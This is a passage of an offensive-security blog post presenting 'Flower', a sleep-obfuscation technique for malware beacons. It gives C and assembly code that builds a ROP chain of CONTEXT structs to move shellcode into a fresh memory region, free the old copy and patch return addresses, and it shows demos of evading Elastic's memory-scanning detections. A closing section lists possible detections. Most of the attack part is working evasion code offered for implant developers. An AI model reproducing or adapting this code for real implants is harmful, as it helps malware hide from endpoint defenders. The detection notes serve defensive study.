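                       uintptr_t shift_ofs, unsigned attempt) {
    uintptr_t wanted = shc_start + base_ofs + (uintptr_t)attempt * shift_ofs;
    return wanted & ~(uintptr_t)(ALLOC_GRANULARITY - 1);
}

/* Same retry idea as above, but bounded so a crowded address space
   ends in NULL instead of an endless loop. */
void *fw_try_allocate(fw_alloc_fn alloc, uintptr_t shc_start,
                      uintptr_t base_ofs, uintptr_t shift_ofs,
                      size_t size, unsigned max_attempts) {
    for (unsigned i = 0; i < max_attempts; i++) {
        void *memory = alloc(fw_candidate(shc_start, base_ofs, shift_ofs, i), size);
        if (memory)
            return memory;
    }
    return NULL;
}

/* Demo allocator: pretends everything below 0x30000 is already taken. */
void *fake_alloc(uintptr_t address, size_t size) {
    (void)size;
    return address >= 0x30000u ? (void *)address : NULL;
}
```

If the shift offset is smaller than the granularity, several consecutive attempts collapse onto the same rounded address, so picking a shift that is a multiple of it avoids wasted retries.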
the “ropchain”
For demonstration purposes, and to show this technique just works, we’ll make a helper function that generates an array of CONTEXT structs so you can use them with EKKO/ZILEAN/FOLIAGE/… (also because it’s surprisingly easier to write and understand).
The signature of the function is the following:
FUNC NTSTATUS FwRopChain(
    _In_  PFLOWER_CTX Ctx,
    _In_  ULONG       Delay,
    _In_  PCONTEXT    RopInit,
    _In_  PVOID       NxtBuf,
    _In_  ULONG       Flags,
    _Out_ PCONTEXT*   Rop,
    _Out_ SIZE_T*     RopLen
)
I won’t delve into each parameter as the comments in the project itself should get you going.
Also, because it’s just easier, we allocate our CONTEXT structs on the heap. We will probably not use all of them buuuut that does not matter as we can just free them once we have crafted the ropchain.
//
// allocate FLOWER_MAX_LEN CONTEXTs on the heap
// we will probably not use all of them but easier like this
//
if ( ! NT_SUCCESS( Status = FwpRopAlloc( Ctx, Rop ) ) ) {
    PRINTF( "[FLOWER] [-] FwpRopAlloc failed [Status: 0x%lx]\n", Status );
    goto LEAVE;
}
Once that’s done we can start tinkering with the ropchain itself.
OBF_JMP( Inc, Ctx->Win32.WaitForSingleObjectEx );
Rop[ Inc ]->Rcx = U_PTR( Ctx->Evnts.Start );
Rop[ Inc ]->Rdx = U_PTR( INFINITE );
Rop[ Inc ]->R8  = U_PTR( FALSE );
Inc++;
So far pretty classic, we just want to wait for the start event to be signaled.
OBF_JMP is just a macro to make the usage of JMP gadgets to hide the content of RIP easier and more malleable.
//
// https://github.com/HavocFramework/Havoc/blob/main/payloads/Demon/include/core/SleepObf.h#L16
//
// NOTE: the RDI branch is chained with "else if" so that the RAX
// case does not fall through to the final else and overwrite Rip
//
#define OBF_JMP( i, p ) \
    if ( Flags & FLOWER_GADGET_RAX ) { \
        Rop[ i ]->Rax = U_PTR( p ); \
    } else if ( Flags & FLOWER_GADGET_RDI ) { \
        Rop[ i ]->Rdi = U_PTR( p ); \
    } else { \
        Rop[ i ]->Rip = U_PTR( p ); \
    }
Next we want to move ourselves to the new region (duh), this can be achieved with RtlMoveMemory/RtlCopyMemory or literally any functions that allow you to write a buffer somewhere.
//
// copy ourselves to the new region
// NOTE: can use RtlCopyMemory or literally any write function
//
OBF_JMP( Inc, Ctx->Win32.RtlMoveMemory )
Rop[ Inc ]->Rcx = U_PTR( NxtBuf );
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcBase );
Rop[ Inc ]->R8  = U_PTR( Ctx->ShcLength );
Inc++;
If it wasn't clear yet, **NxtBuf** is a pointer to our "new" memory region.
Obviously, to avoid hoarding memory, we should free the old region:
OBF_JMP( Inc, Ctx->Win32.VirtualFree )
Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );
Rop[ Inc ]->Rdx = U_PTR( 0 );
Rop[ Inc ]->R8  = U_PTR( MEM_RELEASE );
Inc++;
Optionally, we zero out the old copy before freeing the region. This does flip RX to RW, however EtwTi-FluctuationMonitor doesn’t seem to scream at this (possible oversight ?) and the time spent as a “hidden page” is so minimal we might as well disregard it, hence why I included this option:
if ( Flags & FLOWER_ZERO_PROTECT ) {
    OBF_JMP( Inc, Ctx->Win32.VirtualProtect )
    Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );
    Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );
    Rop[ Inc ]->R8  = U_PTR( PAGE_READWRITE );
    Rop[ Inc ]->R9  = U_PTR( &Tmp );
    Inc++;

    OBF_JMP( Inc, Ctx->Win32.RtlZeroMemory )
    Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );
    Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );
    Inc++;
}
Zeroing out the old region by reallocating over it as RW, zeroing it, then freeing it again will be left as an exercise to the reader.
Then we can do stuff like masking our stack, encrypting etc; do remember that NxtBuf is still PAGE_READWRITE here.
Of course, let’s not forget to sleep, else we are running but not hiding :P
//
// could totally use NtDelayExecution etc
// feel free to change
//
OBF_JMP( Inc, Ctx->Win32.WaitForSingleObjectEx )
Rop[ Inc ]->Rcx = U_PTR( NtCurrentProcess() );
Rop[ Inc ]->Rdx = U_PTR( Delay );
Rop[ Inc ]->R8  = U_PTR( FALSE );
Inc++;
Once we are done sleeping we just need to toggle NxtBuf to RX (and signal the end of the ropchain):
OBF_JMP( Inc, Ctx->Win32.VirtualProtect )
Rop[ Inc ]->Rcx = U_PTR( NxtBuf );
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );
Rop[ Inc ]->R8  = U_PTR( PAGE_EXECUTE_READ );
Rop[ Inc ]->R9  = U_PTR( &Tmp );
Inc++;
And then it’s GGs: we only flip the permissions once then free, and that’s legit, unlike “fluctuation” where we keep on flipping protections forever and ever.
can’t C me
As said previously, this technique still allows for things like stack masking and encryption, and since the only real modification is in the ropchain itself, you can use any technique you like to queue the ropchain.
Evasion wise, since we slip past those two new POCs without losing features like stack masking etc, it’s a net gain, at least for now.
what about return addresses ?
If you thought of this, good job :>
After moving, the return addresses on our stack from the nested calls in our beacon still point to the old region we were in prior to “flowing”.
|
;; rebase return address of calling function
;; no need to be inlined in [-Os] since we JMP to it
;; (no CALL => no new frame => no new retaddr)
;;
;; will require [-fno-omit-frame-pointer] as we need RBP (frame ptr)
;; to get the return address, the compiler in [-Os] seems to
;; prefer [ rsp + COMPILE_TIME_OFFSET ], which is not
;; function agnostic
;;
;; FwPatchRetAddr( ImgBase* [rcx], NewBase* [rdx] )
FwPatchRetAddr:
    mov r8, [ rbp + 8 ]     ; load the caller's return address
    sub r8, rcx             ; turn it into an offset from the old base
    add r8, rdx             ; rebase that offset onto the new region
    mov [ rbp + 8 ], r8     ; write the patched return address back
    ret
|
- We get our return address ([rbp+8])
- We subtract our image base
- We add our new base (address of the region we’re flowing into)
- We move the rebased return address back to where it was
- NOTE: if this function is CALL’d instead of JMP’d to or inlined it won’t really work.
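The arithmetic in the steps above can be sketched in plain C. This is only an illustration: `fw_rebase` and its `len` bounds check are hypothetical and not part of the original code, which patches `[rbp+8]` unconditionally in assembly. The bounds check is an assumption I added so that addresses outside the old region (say, a return address into NTDLL) are left alone.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper (not from the original project).
 * If `addr` lies inside [old_base, old_base + len) it is rebased onto
 * `new_base`; otherwise it is returned unchanged.
 */
static uintptr_t fw_rebase(uintptr_t addr, uintptr_t old_base,
                           uintptr_t new_base, size_t len)
{
    /* addresses outside the old region are not ours to patch */
    if (addr < old_base || addr - old_base >= len) {
        return addr;
    }

    /* same math as FwPatchRetAddr: (addr - old) + new */
    return addr - old_base + new_base;
}
```

For example, with an old base of 0x1000 and a new base of 0x9000, a return address of 0x1042 becomes 0x9042, while anything outside the old region is returned untouched.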
I then use it to return to the caller of Flower without crashing.
|
LEAVE:
    //
    // we only want to rebase our return address
    // if the Fw*Obf function succeeded; if it failed
    // we didn't move, so there is nothing to patch
    //
    if ( ! NT_SUCCESS( Status ) ) {
        //
        // sleep with KUSER_SHARED_DATA so even if we failed
        // we can ensure that we delayed execution
        // (obv not good nor ideal but could still be important)
        //
        FwSharedSleep( Delay );
    } else FwPatchRetAddr( Ctx.ShcBase, Ctx.NxtBuf );
|
We need to apply the same idea to NtSignalAndWaitForSingleObject because by the time we’re done waiting for the end object, its return address points to the old, and now freed, memory region.
|
;; wrapper around [NtSignalAndWaitForSingleObject] to patch our retaddr
;; then JMP to the actual function in NTDLL to queue our CONTEXT based ropchain
;;
;; this is done because after queuing our ropchain, the shellcode
;; will have moved elsewhere in memory, thus if [NtSignalAndWaitForSingleObject]
;; was called directly, it would return to the old, now freed, memory (=> CRASH)
;;
;; FwRopStart( FLOWER_ROPSTART_PRM* [rcx] )
FwRopStart:
    ;; save our return address in a volatile register
    pop r10
    push r12
    ;; setup function args from struct
    mov r12, rcx
    mov r11, [ r12 ]         ; Rcx->Func
    mov rcx, [ r12 + 0x8 ]   ; Rcx->Signal
    mov rdx, [ r12 + 0x10 ]  ; Rcx->Wait
    mov r8, [ r12 + 0x18 ]   ; Rcx->Alertable
    mov r9, [ r12 + 0x20 ]   ; Rcx->Timeout
    ;; calculate new return address
    sub r10, [ r12 + 0x28 ]  ; Rcx->ImgBase
    add r10, [ r12 + 0x30 ]  ; Rcx->NewBase
    pop r12
    ;; patch return address of the current frame
    push r10
    ;; JMP to NtSignalAndWaitForSingleObject
    ;;
    ;; we JMP to it instead of CALL'ing it to not generate a
    ;; new frame so we can patch the retaddr of NtSignalAndWaitForSingleObject
    jmp r11                  ; Rcx->Func
    ;; no ret since NtSignalAndWaitForSingleObject
    ;; will do it for us.
|
For easier usage we pass a struct holding our relevant parameters for the function
|
//
// FwRopStart wrapper struct
// idk what type safety is
//
typedef struct _FLOWER_ROPSTART {
    //
    // NtSignalAndWaitForSingleObject + args
    //
    PVOID Func;
    PVOID Signal;
    PVOID Wait;
    PVOID Alertable;
    PVOID TimeOut;
    //
    // retaddr patching
    //
    PVOID ImgBase;
    PVOID NewBase;
} FLOWER_ROPSTART_PRM, *PFLOWER_ROPSTART_PRM;
|
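Since FwRopStart reads this struct through hardcoded offsets (0x0 up to 0x30), reordering a field would silently break the wrapper. A cheap way to guard against that is a set of compile-time checks. The sketch below is my own addition, not part of the original code: it assumes a 64-bit build (8-byte pointers) and uses a local `PVOID` stand-in so it compiles without `<windows.h>`.

```c
#include <assert.h>   /* static_assert (C11) */
#include <stddef.h>   /* offsetof */

/* stand-in for the Windows typedef, only here to keep the sketch standalone */
typedef void *PVOID;

typedef struct _FLOWER_ROPSTART {
    PVOID Func;
    PVOID Signal;
    PVOID Wait;
    PVOID Alertable;
    PVOID TimeOut;
    PVOID ImgBase;
    PVOID NewBase;
} FLOWER_ROPSTART_PRM, *PFLOWER_ROPSTART_PRM;

/* these must match the offsets the assembly stub dereferences (x64 only) */
static_assert(offsetof(FLOWER_ROPSTART_PRM, Func)      == 0x00, "Func offset");
static_assert(offsetof(FLOWER_ROPSTART_PRM, Signal)    == 0x08, "Signal offset");
static_assert(offsetof(FLOWER_ROPSTART_PRM, Wait)      == 0x10, "Wait offset");
static_assert(offsetof(FLOWER_ROPSTART_PRM, Alertable) == 0x18, "Alertable offset");
static_assert(offsetof(FLOWER_ROPSTART_PRM, TimeOut)   == 0x20, "TimeOut offset");
static_assert(offsetof(FLOWER_ROPSTART_PRM, ImgBase)   == 0x28, "ImgBase offset");
static_assert(offsetof(FLOWER_ROPSTART_PRM, NewBase)   == 0x30, "NewBase offset");
```

If someone later inserts or reorders a field, the build fails instead of the stub loading garbage into its registers.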
And to craft said parameter struct I made a helper function to make the usage even easier.
|
FUNC NTSTATUS FwRopstartPrm(
    _In_  PFLOWER_CTX          Ctx,
    _Out_ PFLOWER_ROPSTART_PRM Prm,
    _In_  HANDLE               Event,
    _In_  HANDLE               Wait,
    _In_  PVOID                OldBase,
    _In_  PVOID                NxtBase
) {
    if ( ! Ctx || ! Prm ) {
        return STATUS_UNSUCCESSFUL;
    }
    //
    // NtSignalAndWaitForSingleObject args
    //
    Prm->Func      = Ctx->Win32.NtSignalAndWaitForSingleObject;
    Prm->Signal    = Event;
    Prm->Wait      = Wait;
    Prm->Alertable = FALSE;
    Prm->TimeOut   = NULL;
    //
    // rebasing info
    //
    Prm->ImgBase = OldBase;
    Prm->NewBase = NxtBase;
    return STATUS_SUCCESS;
}
|
We then use FwRopStart in place of NtSignalAndWaitForSingleObject and it won’t return into the old memory :)
|
FLOWER_ROPSTART_PRM RopPrm = { 0 };
//
// ensure struct is zero'd
//
MmZero( &RopPrm, sizeof( FLOWER_ROPSTART_PRM ) );
[ ... ]
//
// prepare wrapper struct for NtSignalAndWaitForSingleObject
//
if ( ! NT_SUCCESS( Status = FwRopstartPrm( Ctx, &RopPrm, Ctx->Evnts.Start, Thread, Ctx->ShcBase, Ctx->NxtBuf ) ) ) {
    PRINTF( "[FLOWER] [-] Failed to prepare FLOWER_ROPSTART_PRM struct [Status: 0x%lx]\n", Status );
    goto LEAVE;
}
//
// signal the ropchain to start and wait for the thread to be done
// (FwRopStart expects a pointer to the struct in rcx)
//
FwRopStart( &RopPrm );
|
And that’s pretty much it. Do know that this assumes the beacon is fully PIC; if you’re using an RDLL you might need to remap every section, which is possible but a bit annoying I guess.
You can chain this with other stuff, which is the funny thing about sleep obfuscation. I recommend you check out https://dtsec.us/2023-04-24-Sleep/ if HSB is giving you nightmares; that is out of scope for this post however.
Either way, may your malware get jiggy with it now.
demo
Below you can find recordings of this technique against CFG-FindHiddenShellcode and EtwTi-FluctuationMonitor (fyi, my VM is kinda slow, I don’t know if it was ever shut down)
sillyware vs ELASTIC: round 1
in action against CFG-FindHiddenShellcode
sillyware vs ELASTIC: round 2
in action against EtwTi-FluctuationMonitor
2-0
caveats
The first caveat is obviously how you write the code: the more nested your sleep obfuscation routine is (compared to the main function), the more return addresses you’ll have to patch so you don’t jump back into the old location. Not really a big caveat, but I thought I would mention it.
The second is more on the practical level: it would be way better for the beacon to be fully PIC and not an RDLL, because the former only needs to be moved into another RX region whereas an RDLL basically needs to be remapped, which is louder and has a higher overhead. U2U as always however.
Also, whilst trying to use FOLIAGE through fibers, I cannot, at this time, get it to work; without fibers it works fine however. 5pider told me that Austin was using fibers due to the high stack usage of the Cobalt Strike beacon, so fibers in our case don’t seem to be relevant when it comes to stealth.
Silly oversight or just limitation ? At this time I am unsure (not like it matters lol)
going beyond
In the realm of in-memory evasion, there are many more things to research and this was only one of them. In and of itself this technique still has some flaws, whether it’s because I lazily decided to use techniques like EKKO to showcase it or because the behavior is still a bit different from actual JIT. I hope this adds something to the table, considering “malware development” is, these days, an overdone topic.
Austin Hudson (ilove2pwn) made a tweet about CFG-FindHiddenShellcode so I thought I would link it here: even though I doubt it would get around EtwTi-FluctuationMonitor, it most certainly would get around CFG-FindHiddenShellcode.
JIT seems to be becoming more and more of a pet peeve for detections such as stack tracing or memory scanning in general. This shows that it’s something worth elaborating on for attackers and defenders alike.
detections
There is plenty of detection ground for this technique. First off, the usage of FOLIAGE/EKKO/ZILEAN to queue the modified ropchain is in itself a bit weird. As far as I know, ELASTIC is able to detect APCs trying to run NtContinue to indirectly call the necessary functions. Timers being blocking is also suspicious, which HSB leverages as an IOC. I plan on releasing a version of flower that does not rely on such techniques, thus circumventing the need for NtContinue etc.
In itself the following things are possible to detect:
- Abnormal delay between RW then RX, addressable by adding an additional step to sleep in RX instead
- CONTEXT structure pointing to RtlMoveMemory/RtlCopyMemory or literally anything that writes memory from one buffer to another
- CONTEXT structure pointing to NtFreeVirtualMemory
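To make the first bullet a bit more concrete for defenders, here is a rough sketch of what such a heuristic could look like. Everything in it is hypothetical: the `prot_event_t` record is a simplified stand-in for real protection-change telemetry, the events are assumed to be sorted by time, and the threshold is something you would have to tune against legitimate JIT behavior.

```c
#include <stddef.h>
#include <stdint.h>

/* simplified, made-up protection states for the sketch */
typedef enum { FW_PROT_RW, FW_PROT_RX } fw_prot_t;

/* hypothetical event record: one protection change on one region */
typedef struct {
    uintptr_t base;      /* base address of the region        */
    fw_prot_t new_prot;  /* protection the region was set to  */
    uint64_t  time_ms;   /* timestamp of the change, in ms    */
} prot_event_t;

/*
 * Counts RW -> RX flips on the same region where the region stayed RW
 * for longer than `threshold_ms`. Assumes `ev` is sorted by time.
 */
static size_t count_delayed_rw_to_rx(const prot_event_t *ev, size_t n,
                                     uint64_t threshold_ms)
{
    size_t hits = 0;

    for (size_t i = 0; i < n; i++) {
        if (ev[i].new_prot != FW_PROT_RX) {
            continue;
        }
        /* walk backwards to the previous event for the same region */
        for (size_t j = i; j-- > 0; ) {
            if (ev[j].base != ev[i].base) {
                continue;
            }
            if (ev[j].new_prot == FW_PROT_RW &&
                ev[i].time_ms - ev[j].time_ms > threshold_ms) {
                hits++;
            }
            break; /* only the most recent earlier event matters */
        }
    }
    return hits;
}
```

A real JIT engine usually flips to RX right after emitting code, so a region that sits in RW for the length of a beacon sleep before going RX stands out. As noted in the bullet, sleeping in RX instead would sidestep this specific check.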
That is where the third presented POC actually becomes interesting, by constructing normal process behavior profiles it would be possible to find the nuance between this and actual JIT.
I have been working on a modular and more modern usermode memory scanner that tries to hunt for IOCs that aren’t hunted for yet (at least to my knowledge); a blogpost about this is coming soon enough as well.
le funny
Sleep obfuscation is certainly cool but an easy win is still chilling in a .NET RWX region (“mockingjay” or bring your own RWX section clowns in shambles) as you aren’t stomping anything (no easily spottable discrepancies between the module in memory and on disk), it’s still legit and it’s RWX, great success.
.NET JIT is honestly a very interesting subject, I recommend you check out this blogpost by XPN: https://blog.xpnsec.com/weird-ways-to-execute-dotnet/ and this gist by dylan https://gist.github.com/susMdT/2d13330f6a5bfa482555e22430c0eb82
acknowledgments
I would first like to thank Dylan Tran (dtsec.us) for being an awesome friend; we discussed this idea a while back and he was the first one to try it. He was also the one to proofread my suboptimal English. Do give his work a read, as it inspired me and I hope it will inspire others as well.
I would also like to thank ELASTIC for sharing a lot of their detections with the public, I believe this should be standard behavior for every vendor but here we are with most of those vendors being borderline scammers.
(In no special order)
Thank you for reading :)